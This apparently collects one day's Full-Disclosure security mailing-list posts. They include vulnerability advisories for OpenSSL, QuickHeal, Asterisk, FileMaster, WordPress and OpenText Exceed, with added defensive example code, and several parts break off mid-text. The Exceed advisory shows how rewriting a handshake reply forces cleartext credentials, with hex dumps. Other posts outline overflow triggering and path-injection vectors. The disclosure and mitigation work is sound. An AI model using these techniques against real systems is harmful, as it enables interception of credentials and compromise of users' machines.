Re: [Full-disclosure] RDRAND used directly when default engines loaded in openssl-1.0.1-beta1 through openssl-1.0.1e

2013-12-16 Thread coderman
On Sat, Dec 14, 2013 at 4:33 AM, coderman  wrote:
> ...
> if you are using an application linked with openssl-1.0.1-beta1
> through openssl-1.0.1e you should do one of the following:


updated list with env suggestion:

a.) rebuild your OpenSSL with OPENSSL_NO_RDRAND defined

b.) call ENGINE_unregister_RAND() on "rdrand" engine followed by
ENGINE_register_all_complete() to unregister rdrand as default

c.) set OPENSSL_ia32cap="~0x4000" in global environment
(this is a poor fix)

d.) git pull latest openssl with commit: "Don't use rdrand engine as
default unless explicitly requested." - Dr. Stephen Henson



"what is affected??" - someone

sorry, i am not your distro maintainer.  but the list includes,
potentially (depending on configure opts / runtime / etc):
RHEL 6.5, 7.0
CentOS 6.5
Fedora 18,19,rawhide
Ubuntu 12.04, 12.10, 13.04, 13.10, trusty
Debian 7.0, jessie, sid
Gentoo stable&unstable
Knoppix 7.0.5, 7.2.0
Kali 1.0.5
Slackware 14, 14.1, current
... if ssh is built with --with-ssl-engine. These all use OpenSSL 1.0.1+.
 (remember both ssh client and server may use engines!)

and other libs, like:
M2Crypto
libpam-sshagent-auth
encfs
... which appear to use OpenSSL default engines.


but really, you should go check your shit.



best regards,


P.S. if anyone is aware of RDRAND engine backports to OpenSSL 1.0.0*
or 0.9.8* in any distros i'd like to know about it!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
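A check for the condition the message above describes, added here as an example (it is not part of coderman's message and not OpenSSL code). It loads libcrypto through ctypes, does what an engine-enabled application does at start-up (ENGINE_load_builtin_engines() followed by ENGINE_register_all_complete()), asks which ENGINE is the default RAND source, and, if that is rdrand, applies option (b) above and asks again. The library lookup via ctypes.util and the report keys are my assumptions about the local build; on a libcrypto without the rdrand engine every answer is simply False.

```python
import ctypes
import ctypes.util


def load_libcrypto():
    """Locate and load the system libcrypto, or return None when there is
    none (assumption: ctypes.util can find it, e.g. libcrypto.so.1.0.0)."""
    name = ctypes.util.find_library("crypto")
    if not name:
        return None
    try:
        return ctypes.CDLL(name)
    except OSError:
        return None


def default_rand_engine(lib):
    """Return the id of the ENGINE currently selected as default RAND
    provider, or None when libcrypto falls back to its own RAND_METHOD."""
    lib.ENGINE_get_default_RAND.restype = ctypes.c_void_p
    lib.ENGINE_get_id.restype = ctypes.c_char_p
    lib.ENGINE_get_id.argtypes = [ctypes.c_void_p]
    lib.ENGINE_finish.argtypes = [ctypes.c_void_p]
    e = lib.ENGINE_get_default_RAND()   # returns a functional reference
    if not e:
        return None
    engine_id = lib.ENGINE_get_id(e).decode("ascii")
    lib.ENGINE_finish(e)                # release that reference again
    return engine_id


def check_rdrand_default(lib=None):
    """Reproduce what an engine-using application does at start-up, report
    whether rdrand ends up as the default RAND and, if it does, unregister
    it (option b above) and report the state after that."""
    lib = lib if lib is not None else load_libcrypto()
    report = {"libcrypto": None, "rdrand_is_default": None,
              "rdrand_is_default_after_unregister": None}
    if lib is None:
        return report
    report["libcrypto"] = getattr(lib, "_name", None)
    try:
        lib.ENGINE_load_builtin_engines()
        lib.ENGINE_register_all_complete()
        report["rdrand_is_default"] = default_rand_engine(lib) == "rdrand"
        if report["rdrand_is_default"]:
            lib.ENGINE_by_id.restype = ctypes.c_void_p
            lib.ENGINE_by_id.argtypes = [ctypes.c_char_p]
            lib.ENGINE_unregister_RAND.argtypes = [ctypes.c_void_p]
            lib.ENGINE_free.argtypes = [ctypes.c_void_p]
            e = lib.ENGINE_by_id(b"rdrand")      # structural reference
            if e:
                lib.ENGINE_unregister_RAND(e)    # drop it from the RAND table
                lib.ENGINE_free(e)
        report["rdrand_is_default_after_unregister"] = (
            default_rand_engine(lib) == "rdrand")
    except AttributeError:
        pass            # libcrypto built with OPENSSL_NO_ENGINE: nothing to check
    return report


if __name__ == "__main__":
    for key, value in check_rdrand_default().items():
        print("%-36s %s" % (key, value))
```

Two things a practitioner should keep in mind when turning this into an in-process fix: RAND_get_rand_method() caches whatever it resolves the first time it is called, so the unregister has to happen before the application's first RAND_bytes()/RAND_pseudo_bytes(); and the check above re-queries ENGINE_get_default_RAND() rather than running ENGINE_register_all_complete() a second time, because that call registers the RAND method of every loaded engine again.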


[Full-disclosure] QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability

2013-12-16 Thread Vulnerability Lab
Document Title:
===
QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1171

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6767

CVE-ID:
=
CVE-2013-6767


Release Date:
=
2013-12-16


Vulnerability Laboratory ID (VL-ID):

1171


Common Vulnerability Scoring System:

5.6


Product & Service Introduction:
===
The simple interface and best virus protection technology of Quick Heal 
AntiVirus Pro ensures complete security without interrupting 
or slowing down your system. Real time cloud security restricts access to 
malware infected websites. Spam filters stop phishing and 
infected emails from reaching your inbox. Uninterrupted PC usage and viewing 
without prompts. 

Quick Heal Anti-Virus is an all-round antivirus and security tool aimed at the 
intermediate home user. On first appearances, Quick Heal 
Anti-Virus doesn’t do well. Installation is complicated, and the initial window 
that shows up is not, in fact, the main interface. Once 
you find your way back to the control center, however, things become much 
clearer.

Visually, Quick Heal Anti-Virus is fairly successful. It has a nice, if not 
revolutionary, interface and all the sections are easy 
to navigate. It also has a good selection of configuration options, where you 
can customize everything from what behavior the program 
takes when it finds a virus to setting a password so nobody can change your 
configurations.

(Copy of the Homepage: http://www.quickheal.com/download-free-antivirus )


Abstract Advisory Information:
==
An independent laboratory researcher discovered a local stack buffer overflow 
vulnerability in the official QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro 
software.


Vulnerability Disclosure Timeline:
==
2013-12-16:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Quick Heal Technologies (P) Ltd
Product: QuickHeal AntiVirus - Software 7.0.0.1 (build 2.0.0.1 - 2.0.0.0)


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

A local stack buffer overflow vulnerability has been discovered in the official 
QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro software.
The vulnerability allows local low privileged user accounts to compromise the 
system by a classic stack overflow issue. 

QuickHeal Antivirus suffers from improper handling of buffers in its 
`pepoly.dll` module under certain conditions, which leads 
to a stack overflow. Upon disabling the `Core scanning server` service, the 
vulnerable point can be triggered and crash the system. 
Just run the PoC and, once you see the properties dialog, change your tab from 
`General` to `QuickHeal`. This will cause QuickHeal 
to scan your file and report back the file status (whether it is infected 
or clean). It is notable that, under normal conditions, 
I was unable to trigger the vulnerability, and this is the reason why I 
inject a DLL into `explorer.exe` to trigger the bug 
in the right manner.

The vulnerability is located in the generated PE file `*.text` value. Local 
attackers are able to overflow the process by a 
manipulated import of a malicious PE file. The issue is a classic (unicode) 
stack buffer overflow. Local attackers can overwrite 
the registers to compromise the system or crash the QuickHeal software system 
process. The security risk of the local stack buffer 
overflow vulnerability is estimated as medium(+) with a CVSS (common 
vulnerability scoring system) count of 5.6(+)|(-)5.7.

The vulnerability can be exploited by local attackers with a low privileged 
system user account and without user interaction. 
Successful exploitation of the local stack buffer overflow software 
vulnerability results in process- and system compromise. 


Proof of Concept (PoC):
===
The local stack buffer overflow vulnerability can be exploited by local 
attackers with low privileged system user account and 
without user interaction. For security demonstration or to reproduce the 
vulnerability follow the provided information and steps below.


--- PoC Debug Logs --- 
eax=15bc ebx=03f48a0c ecx=03f12a34 edx=03f47a68 esi=089c84e8 edi=
eip=05bab107 esp=03f47a2c ebp=000822d8 iopl=0 nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0202
*** WARNING: Unable to verify checksum for 
C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\PROGRA~1\QUICKH~1\QUICKH~1\pepoly.dll - 
pepoly!GetRealTypeByContents+0x297147:
Missing image name, possible paged-out or corrup

[Full-disclosure] AST-2013-007: Asterisk Manager User Dialplan Permission Escalation

2013-12-16 Thread Asterisk Security Team
   Asterisk Project Security Advisory - AST-2013-007

             Product  Asterisk
             Summary  Asterisk Manager User Dialplan Permission Escalation
  Nature of Advisory  Permission Escalation
      Susceptibility  Remote Authenticated Sessions
            Severity  Minor
      Exploits Known  None
         Reported On  November 25, 2013
         Reported By  Matt Jordan
           Posted On  December 16, 2013
     Last Updated On  December 16, 2013
    Advisory Contact  David Lee < dlee AT digium DOT com >
            CVE Name  Pending

Description  External control protocols, such as the Asterisk Manager
             Interface, often have the ability to get and set channel
             variables; this allows the execution of dialplan functions.

             Dialplan functions within Asterisk are incredibly powerful,
             which is wonderful for building applications using Asterisk.
             But during the read or write execution, certain dialplan
             functions do much more. For example, reading the SHELL()
             function can execute arbitrary commands on the system Asterisk
             is running on. Writing to the FILE() function can change any
             file that Asterisk has write access to.

             When these functions are executed from an external protocol,
             that execution could result in a privilege escalation.

Resolution   Asterisk can now inhibit the execution of these functions
             from external interfaces such as AMI, if live_dangerously in
             the [options] section of asterisk.conf is set to no.

             For backwards compatibility, live_dangerously defaults to
             yes, and must be explicitly set to no to enable this
             privilege escalation protection.

                               Affected Versions
             Product                 Release Series
        Asterisk Open Source         1.8.x               All Versions
        Asterisk Open Source         10.x                All Versions
        Asterisk with Digiumphones   10.x-digiumphones   All Versions
        Asterisk Open Source         11.x                All Versions
        Certified Asterisk           1.8.x               All Versions
        Certified Asterisk           11.x                All Versions

                                  Corrected In
             Product                      Release
        Asterisk Open Source              1.8.24.1, 10.12.4, 11.6.1
        Asterisk with Digiumphones        10.12.4-digiumphones
        Certified Asterisk                1.8.15-cert4, 11.2-cert3

                                    Patches
  SVN URL                                                                 Revision
  http://downloads.asterisk.org/pub/security/AST-2013-007-1.8.diff         Asterisk 1.8
  http://downloads.asterisk.org/pub/security/AST-2013-007-10.diff          Asterisk 10
  http://downloads.asterisk.org/pub/security/AST-2013-007-10-digiumphones.diff   Asterisk 10-digiumphones
  http://downloads.asterisk.org/pub/security/AST-2013-007-11.diff          Asterisk 11
  http://downloads.asterisk.org/pub/security/AST-2013-007-1.8.15.diff      Certified Asterisk 1.8.15
  http://downloads.asterisk.org/pub/security/AST-2013-007-11.2.diff        Certified Asterisk 11.2

   Links https://issues.asterisk.org/jira/browse/ASTERISK-22905   

Asterisk Project Securit
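The setting the Resolution section refers to, shown as an added configuration example; this is not text from the advisory or from the asterisk.conf shipped with Asterisk. The section and key names are the ones the advisory gives; the comment lines and the value for the weak case are mine.

```ini
; asterisk.conf

[options]
; Default on the affected releases (and what you get when the key is absent):
; AMI and other external interfaces may read or write any dialplan function,
; including SHELL() and FILE(), with Asterisk's own privileges.
;live_dangerously = yes

; Hardened: external interfaces are refused those functions. Requires one of
; the corrected releases listed above; older builds ignore the key.
live_dangerously = no
```

After changing the value, restart Asterisk (the [options] section is read at start-up) and verify on a test box that an AMI Getvar of SHELL() is now rejected rather than executed.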

[Full-disclosure] AST-2013-006: Buffer Overflow when receiving odd length 16 bit SMS message

2013-12-16 Thread Asterisk Security Team
   Asterisk Project Security Advisory - AST-2013-006

             Product  Asterisk
             Summary  Buffer Overflow when receiving odd length 16 bit SMS
                      message
  Nature of Advisory  Buffer Overflow and Remote Crash
      Susceptibility  Remote SMS Messages
            Severity  Major
      Exploits Known  None
         Reported On  September 26, 2013
         Reported By  Jan Juergens
           Posted On  December 16, 2013
     Last Updated On  December 16, 2013
    Advisory Contact  Scott Griepentrog
            CVE Name  Pending

Description  A 16 bit SMS message that contains an odd message length 
 value will cause the message decoding loop to run forever.   
 The message buffer is not on the stack but will be   
 overflowed resulting in corrupted memory and an immediate
 crash.   

Resolution  This patch corrects the evaluation of the message length  
indicator, ensuring that the message decoding loop will stop  
at the end of the received message.   
  
Thanks to Jan Juergens for finding, reporting, testing, and   
providing a fix for this problem. 

                               Affected Versions
             Product                 Release Series
        Asterisk Open Source         1.8.x               All Versions
        Asterisk Open Source         10.x                All Versions
        Asterisk with Digiumphones   10.x-digiumphones   All Versions
        Asterisk Open Source         11.x                All Versions
        Certified Asterisk           1.8.x               All Versions
        Certified Asterisk           11.x                All Versions

                                  Corrected In
             Product                      Release
        Asterisk Open Source              1.8.24.1, 10.12.4, 11.6.1
        Asterisk with Digiumphones        10.12.4-digiumphones
        Certified Asterisk                1.8.15-cert4, 11.2-cert3

                                    Patches
  SVN URL                                                                 Revision
  http://downloads.asterisk.org/pub/security/AST-2013-006-1.8.diff         Asterisk 1.8
  http://downloads.asterisk.org/pub/security/AST-2013-006-10.diff          Asterisk 10
  http://downloads.asterisk.org/pub/security/AST-2013-006-10-digiumphones.diff   Asterisk 10-digiumphones
  http://downloads.asterisk.org/pub/security/AST-2013-006-11.diff          Asterisk 11
  http://downloads.asterisk.org/pub/security/AST-2013-006-1.8.15.diff      Certified Asterisk 1.8.15
  http://downloads.asterisk.org/pub/security/AST-2013-006-11.2.diff        Certified Asterisk 11.2

   Links https://issues.asterisk.org/jira/browse/ASTERISK-22590   

Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security  
  
This document may be superseded by later versions; if so, the latest  
version will be posted at 
http://downloads.digium.com/pub/security/AST-2013-006.pdf and 
http://downloads.digium.com/pub/security/AST-2013-006.html

Revision History
  Date        Editor              Revisions Made
  12/16/2013  Scott Griepentrog   Initial Revision

   Asterisk Project Security Advisory - AST-2013-006
  Copyright (c) 2013 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
   original,
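The failure mode the advisory describes, as an added illustrative example; this is not Asterisk's SMS code and does not reproduce its structure. It assumes the "16 bit" message is UCS-2 user data whose length indicator counts octets, so a valid indicator is always even. The naive decoder walks the data two octets at a time and stops only when its cursor equals the indicator; for an odd value the cursor never gets there. In C that loop keeps reading and writing past the buffer; here a max_iters cap makes the demonstration return None instead of hanging. The checked decoder validates the indicator against both the alignment and the buffer before it starts.

```python
def decode_ucs2_naive(ud, udl, max_iters=64):
    """Vulnerable pattern: terminate when the cursor *equals* udl.
    An odd udl is never reached, so the loop runs on; max_iters exists
    only so this demo returns (None) rather than spinning forever."""
    out = []
    i = 0
    for _ in range(max_iters):
        if i == udl:
            return "".join(out)
        # Where C would read whatever lies beyond the buffer, substitute 0.
        hi = ud[i] if i < len(ud) else 0
        lo = ud[i + 1] if i + 1 < len(ud) else 0
        out.append(chr((hi << 8) | lo))
        i += 2
    return None          # did not terminate: the overflow case


def decode_ucs2_checked(ud, udl):
    """Hardened: reject an indicator that is odd or longer than the data,
    then bound the loop by the data rather than by an equality test."""
    if udl % 2 or udl > len(ud):
        raise ValueError("bad UCS-2 length indicator %d for %d octets"
                         % (udl, len(ud)))
    return "".join(chr((ud[i] << 8) | ud[i + 1]) for i in range(0, udl, 2))


# Constructed sample: UCS-2 big-endian "Hi".
SAMPLE_UD = bytes([0x00, 0x48, 0x00, 0x69])

if __name__ == "__main__":
    print(decode_ucs2_naive(SAMPLE_UD, 4), decode_ucs2_checked(SAMPLE_UD, 4))
    print(decode_ucs2_naive(SAMPLE_UD, 5))       # None: would loop forever
    try:
        decode_ucs2_checked(SAMPLE_UD, 5)
    except ValueError as err:
        print("rejected:", err)
```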

[Full-disclosure] BodyHacking Convention 2014

2013-12-16 Thread I)ruid
Hello everyone!

I thought you all would probably be interested in this new convention
that I'm attempting to start which will be focused on "body hacking".
While most conferences and conventions related to this subject matter
seem to be more focused on transhumanism, genetics, etc., this one is
focused on what YOU can do to YOUR OWN BODY, RIGHT NOW.  This covers
both modification and augmentation (wearables), and in regards to
modification, both functional and aesthetic.

Whether or not we hold the convention rests entirely upon the success of
the fund raising campaign, which you can find here:

http://igg.me/at/bodyhacking-convention/x/4466426

Note that the perks are designed around all types of involvement with
the conference, from attendees to sponsors to vendors, so hopefully
you'll find something there that fits your level of interest!

Thanks,

-- 
I)ruid, C²ISSP
dr...@caughq.org
http://druid.caughq.org


signature.asc
Description: This is a digitally signed message part

[Full-disclosure] FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities

2013-12-16 Thread Vulnerability Lab
Document Title:
===
FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1170


Release Date:
=
2013-12-16


Vulnerability Laboratory ID (VL-ID):

1170


Common Vulnerability Scoring System:

8.2


Product & Service Introduction:
===
FileMaster is a file manager, downloader, document viewer, video/audio player, 
text editor, wifi drive, and more 
for iPhone, iPad & iPod Touch. Transfer files from your computer, carry them 
around with you, and share them with 
your friends. Using FileMaster is easy. Just long-press on a file or folder 
icon to display a popup menu. 

Simply tap your selection and you’re ready to go. You can tap on the screen to 
copy, paste, create folders and so on.
There’s no need to worry about the security of FileMaster, either. Your files 
can be accessed remotely with a password 
or locally with a master passcode. No one but you will see what’s in your 
FileMaster. With FileMaster, you can easily 
share files with your friends (peer-to-peep only) using Bluetooth.

(Copy of the Homepage: 
https://itunes.apple.com/en/app/filemaster-file-manager-downloader/id582219355 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the Shenzhen Youmi IT Co. Ltd - FileMaster v3.1 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==
2013-12-16:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Shenzhen Youmi Information Technology Co. Ltd
Product: FileMaster - File Manager & Downloader (Mobile Application) 3.1


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

1.2
A local file/path include web vulnerability has been discovered in the Shenzhen 
Youmi IT Co. Ltd FileMaster v3.1 mobile web-application for Apple iOS.
The local file include web vulnerability allows remote attackers to include 
unauthorized local file requests or system-specific path commands to 
compromise the web-application or device.

The remote file include web vulnerability is located in the vulnerable 
`filename` value of the `start upload` module (web interface). Remote attackers 
can manipulate the `filename` value of the POST request to the `start 
upload` module to compromise the mobile application. The attack vector is 
persistent and the request method is POST. The local file/path include executes 
in the main `file dir index` list. 

A second possibility is to execute the payload by using the compress function. 
After the payload with a non-executable file has been injected, the 
attacker can use the compress function to generate a .zip package. The 
generated zip executes the payload in the filename itself and affects 
the main index listing too. The security risk of the local file include web 
vulnerability is estimated as high with a CVSS (common vulnerability 
scoring system) count of 8.1(+)|(-)8.2.

Exploitation of the local file include web vulnerability requires no user 
interaction or privileged web-application user account with password. 
Successful exploitation of the local web vulnerability results in application 
or connected-device component compromise by unauthorized local 
file include web attacks.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Start Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir List (http://localhost:8000)



1.2
A local file/path include web vulnerability has been discovered in the Shenzhen 
Youmi IT Co. Ltd FileMaster v3.1 mobile web-application for Apple iOS.
The local file include web vulnerability allows remote attackers to include 
unauthorized local file requests or system-specific path commands to 
compromise the web-application or device.

The remote file include web vulnerability is located in the vulnerable 
`folder/path` value of the `Create Folder` module (web interface).
Remote attackers can inject their own local file requests or system-specific path 
commands as the `folder name`. The request method is POST and the 
attack vector is persistent. The local file/path include executes in the 
main `file dir index` list. The security risk of the local 
file include web vulnerability is estimated as high with a CVSS (common 
vulnerability scoring system) count of 8.0(+)|(-)8.1.

Exploitation of the local file include web vulnerability requires no user 
interaction or privileged web-application user account with password. 
Successful exploitation
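Both issues come down to a user-supplied name (the upload `filename`, the `Create Folder` name, and the name inside a generated .zip) being stored as given and then used as a path and echoed into the directory index. The following is an added example of the server-side validation such a wifi-drive web interface needs; it is my code, not FileMaster's, and the upload root and the listing markup are assumptions.

```python
import html
import posixpath
import re

# A single plain file-system component: no separators, no leading dot,
# printable ASCII only. Tighten or widen to taste; the point is an allow-list.
_ALLOWED = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._ -]{0,127}$")


def validate_upload_name(filename):
    """Return the name unchanged if it is a safe bare component, else raise.
    Applies equally to the upload `filename`, a new folder name, and every
    member name read back out of an archive before it is extracted."""
    if not isinstance(filename, str) or not filename:
        raise ValueError("empty file name")
    if "\x00" in filename or "/" in filename or "\\" in filename:
        raise ValueError("path separator or NUL in file name")
    if filename.startswith("."):
        raise ValueError("dot file or traversal component")
    if not _ALLOWED.match(filename):
        raise ValueError("disallowed characters in file name")
    return filename


def safe_join(upload_root, filename):
    """Join under the upload root and prove the result is still beneath it,
    so a name that slipped past validation can still not leave the root."""
    name = validate_upload_name(filename)
    root = posixpath.normpath(upload_root)
    full = posixpath.normpath(posixpath.join(root, name))
    if posixpath.dirname(full) != root:
        raise ValueError("escaped upload root")
    return full


def index_entry(filename):
    """One row of the directory index: the stored name is data, never markup,
    so it is escaped at output time regardless of what was stored."""
    return "<li>%s</li>" % html.escape(filename, quote=True)


if __name__ == "__main__":
    for candidate in ("report.pdf", "../secret", "/etc/passwd", "a/b.txt"):
        try:
            print("accepted:", safe_join("/var/app/uploads", candidate))
        except ValueError as err:
            print("rejected %r: %s" % (candidate, err))
    print(index_entry('x<b>y</b>.txt'))
```

Validation has to happen at write time and escaping at render time; doing either alone leaves the index listing exposed through the other path (a stored name that is later compressed, or a listing that trusts what is on disk).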

[Full-disclosure] Release: Faraday Penetration Test IDE

2013-12-16 Thread Francisco Amato
We are happy to announce our first release of Faraday (beta), an open
source collaborative Penetration Test IDE console that uses the same
tools you use every day.

Faraday introduces a new concept: the Integrated Penetration-Test Environment (IPE).

We built a plugin system where all the I/O from the terminal gets
interpreted; if we have a plugin for the command, the output is
processed and added to a knowledge base in a transparent way.

Our idea was to build a tool that helps from the perspective of a
pentester without changing the way you work, adding support for
multi-user collaboration on security testing projects.

It was developed with a specialized set of functionalities that help users
improve their own work by adding collaborative data sharing, indexing
and analysis of the knowledge generated during the engagement of a
security audit.

[Features]
* 40+ plugins (Metasploit, Amap, Arachni, Dnsenum, Medusa, Nmap,
Nessus, w3af, Zap and more!)
* Collaborative support
* Information Highlighting
* Knowledge Filtering
* Information Dashboard
* Conflict Detection
* Support for multiple Workspaces
* IntelliSense Support
* Easy Plugin Development
* XMLRPC, XML and Regex Parsers

Get it now:
http://www.faradaysec.com
https://github.com/infobyte/faraday


[Contact]
@faradaysec
#faraday-dev on irc.freenode.net

We hope you enjoy it!

--
Francisco Amato
http://www.linkedin.com/in/famato
http://twitter.com/famato

Infobyte LLC.
2699 S. Bayshore Dr #300.
[33133], Miami, FL
Phone: +1 305 851 3373
http://www.infobytesec.com
http://blog.infobytesec.com
http://twitter.com/infobytesec

___
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by Infobyte for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify Infobyte immediately by contacting the
sender via reply e-mail or forwarding to Infobyte at in...@infobytesec.com.



[Full-disclosure] Information Leakage and Backdoor vulnerabilities in WordPress

2013-12-16 Thread MustLive

Hello list!

As I announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), 
I conducted a Day of bugs in WordPress 3. On 30.11.2013 I disclosed many new 
vulnerabilities in WordPress. I disclosed 10 holes (they were placed at 
my site for your attention). And this is a translation of the first part of 
these holes.


These are Information Leakage and Backdoor vulnerabilities in WordPress, 
which I have known about since June 2006 and which are still present in all 
versions of WP.


-
Affected products:
-

Vulnerable are WordPress 3.7.1 and previous versions. And also WP 3.8, which 
was released on 14.12.2013 (since developers traditionally made their new 
version "vulnerabilities compatible").


--
Details:
--

Information Leakage (WASC-13):

The login and password for the e-mail account are saved in the DB in plain text 
(unencrypted) in Writing Settings 
(http://site/wp-admin/options-writing.php), if this functionality is used. 
So by receiving data from the DB via an SQL Injection or Information Leakage 
vulnerability, or by receiving the content of this page via XSS, or by accessing 
the admin panel via any vulnerability, it's possible to get the login and password 
of the e-mail account.


This allows taking over this site (including in the future, via the password 
recovery function) and other sites that have a password recovery 
function which will send letters to this e-mail. Because a user may use 
his main e-mail account in the settings (I saw such cases on the Internet). This 
is a complete jackpot.


Backdoor:

This functionality can also be used as a backdoor, when the attacker's e-mail is 
set in the Writing Settings options, from which posts will be published on the 
web site: with XSS code, with black SEO links, with malware code, etc.



Timeline:
 


2013.11.30 - disclosed at my site (http://websecurity.com.ua/6905/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 





[Full-disclosure] OpenText Exceed On Demand 8 multiple vulnerabilities

2013-12-16 Thread Krzysztof Kotowicz
Exceed onDemand (EoD) is a dependable managed application access solution
designed for enterprises. It offers pixel perfect drawing, low cost
scalability and trusted security access over any network connection.

Vulnerabilities are present in the current version of the software:

 - Product URL:
http://connectivity.opentext.com/products/exceed-ondemand.aspx
 - Product Name: **OpenText Exceed OnDemand 8**
 - Client version: <= **13.8.3.497**
 - Server version: <= **13.8.3.521**

All proof-of-concept codes together with this advisory are hosted at
https://github.com/koto/exceed-mitm

Credits
=
  - Slawomir Jasek ``
  - Krzysztof Kotowicz ``

Dates
=
 - 18.11.2013 - Vendor disclosure
 - 21.11.2013 - Additional vulnerabilities found & reported to vendor
 - 21.11.2013 - Vendor acknowledges the report, "no further details to
share"
 - 06.12.2013 - Query about issue resolution & initial public disclosure
date, vendor ignores
 - 16.12.2013 - Full disclosure

Authentication bypass due to protocol downgrade (CVE-2013-6806)
===

Summary
---
If communication between EoD Client and Cluster Manager can be intercepted
and tampered with (e.g. by using ARP poisoning/DNS hijacking/rogue access
point), EoD Client can be forced to use an older authentication protocol,
sending out credentials in the clear.

Details
---
Upon connecting to Cluster Manager (TCP port 5500), EoD Client sends 4
bytes: `\x01\x01\x00\x00`; in turn CM responds with 4 bytes, negotiating
the version of the protocol to use. The response from the current CM version is
`\x0b\x00\x00\x00`. Such a response triggers an SSL handshake (similar to the
STARTSSL mechanism); credentials are then sent over an encrypted SSLv3
connection:

Wireshark dump of the beginning of connection:

      01 01 00 00
      0b 00 00 00
0004  16 03 00 00 6d 01 00 00  69 03 00 52 8d e8 02 cf  ....m...i..R....
0014  88 d3 96 14 f4 a3 7c 47  f3 0d 85 57 58 d6 c9 f7  ......|G...WX...
0024  18 24 95 15 2e 05 82 27  b7 1e ff 00 00 42 00 3a  .$.....'.....B.:
0034  00 39 00 38 00 35 00 34  00 33 00 32 00 2f 00 1b  .9.8.5.4.3.2./..
0044  00 1a 00 19 00 18 00 17  00 16 00 15 00 14 00 13  ................
0054  00 12 00 11 00 0a 00 09  00 08 00 07 00 06 00 05  ................
0064  00 04 00 03 c0 19 c0 18  c0 17 c0 16 c0 15 00 ff  ................
0074  01 00                                             ..

(16 03 ... bytes initiate SSL connection)

However, if the attacker modifies the response, sending e.g.
`\x01\x01\x00\x00`, the client will send credentials in the clear without
establishing an SSL connection first:

      01 01 00 00
      01 01 00 00
0004  11 01 30 0d 08 03 f1 00  00 00 00 00 00 00 00 00  ..0.............
0014  00 ff ff 7f 00 00 01 ac  3d 08 08 68 69 6a 61 63  ........=..hijac
0024  6b 65 64 0a 30 35 31 45  31 45 31 41 32 36 00 01  ked.051E1E1A26..

Exemplary bytes sent right after the 8-byte handshake contain the user login
and obfuscated password. In a standard connection, the same packet is sent
within the SSL stream.

We did not try to use the Kerberos-based authentication protocol, but the
attack against that will most likely be identical (instead of credentials,
the Kerberos ticket will be sent in the clear).

Access conditions
---
Man-in-the-middle attacker

Impact
--
Credentials disclosure, authentication bypass

Proof of Concept

`exceed-downgrade.py` script can be used to test for and exploit that
vulnerability.

Recommendation
-
Do not allow servers to downgrade a protocol in EoD Client communication.
Always require that the credentials are sent in encrypted channel.

More info
-
  - CWE-757: Selection of Less-Secure Algorithm During Negotiation
('Algorithm Downgrade') - http://cwe.mitre.org/data/definitions/319.html
  - http://en.wikipedia.org/wiki/Opportunistic_encryption


Man in the Middle vulnerability (CVE-2013-6807)


Summary
---
If communication between EoD Client and Cluster Manager can be intercepted
and tampered with (e.g. by using ARP poisoning/DNS hijacking/rogue access
point), communication over SSL channel can be man-in-the-middled due to
using anonymous SSL ciphers.

Details
---
The current version of the EoD client, when connecting to server side components,
establishes an encrypted SSL connection (with the exception of connecting to
EoD Proxy, for which SSL encryption is optional and turned off by default).
In the SSL `ClientHello` message the EoD client advertises several anonymous
ciphers. In their default configuration EoD servers choose one of the
advertised anonymous SSL ciphers for encryption
`SSL_
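The downgrade exchange from CVE-2013-6806 above, as an added Python example (mine, not the authors' exceed-downgrade.py and not OpenText code): the client-side decision on the 4-byte Cluster Manager reply, the attacker's rewrite of that reply, a passive classifier for what follows on port 5500, and extraction of the printable runs from the cleartext login packet reproduced from the advisory's second dump. The constants are taken from the dumps; the function names and the "hardened client refuses anything but the SSL reply" policy are the advisory's recommendation as I would implement it.

```python
import re

CLIENT_HELLO = b"\x01\x01\x00\x00"   # first 4 bytes EoD Client sends (from the dump)
CM_SSL_REPLY = b"\x0b\x00\x00\x00"   # current Cluster Manager reply: start SSL

# Constructed from the advisory's second dump: what the client sends in the
# clear once the reply has been rewritten to \x01\x01\x00\x00.
CLEARTEXT_LOGIN_PACKET = bytes.fromhex(
    "1101300d0803f1000000000000000000"
    "00ffff7f000001ac3d080868696a6163"
    "6b65640a303531453145314132360001"
)


class DowngradeError(Exception):
    """Raised by a client that refuses to talk without SSL."""


def negotiate(cm_reply, allow_downgrade=False):
    """Client-side handling of the 4-byte version reply. The hardened client
    accepts only the SSL-triggering reply; allow_downgrade=True models the
    vulnerable client, which follows whatever version the reply names."""
    if cm_reply == CM_SSL_REPLY:
        return "ssl"
    if allow_downgrade:
        return "legacy-cleartext"
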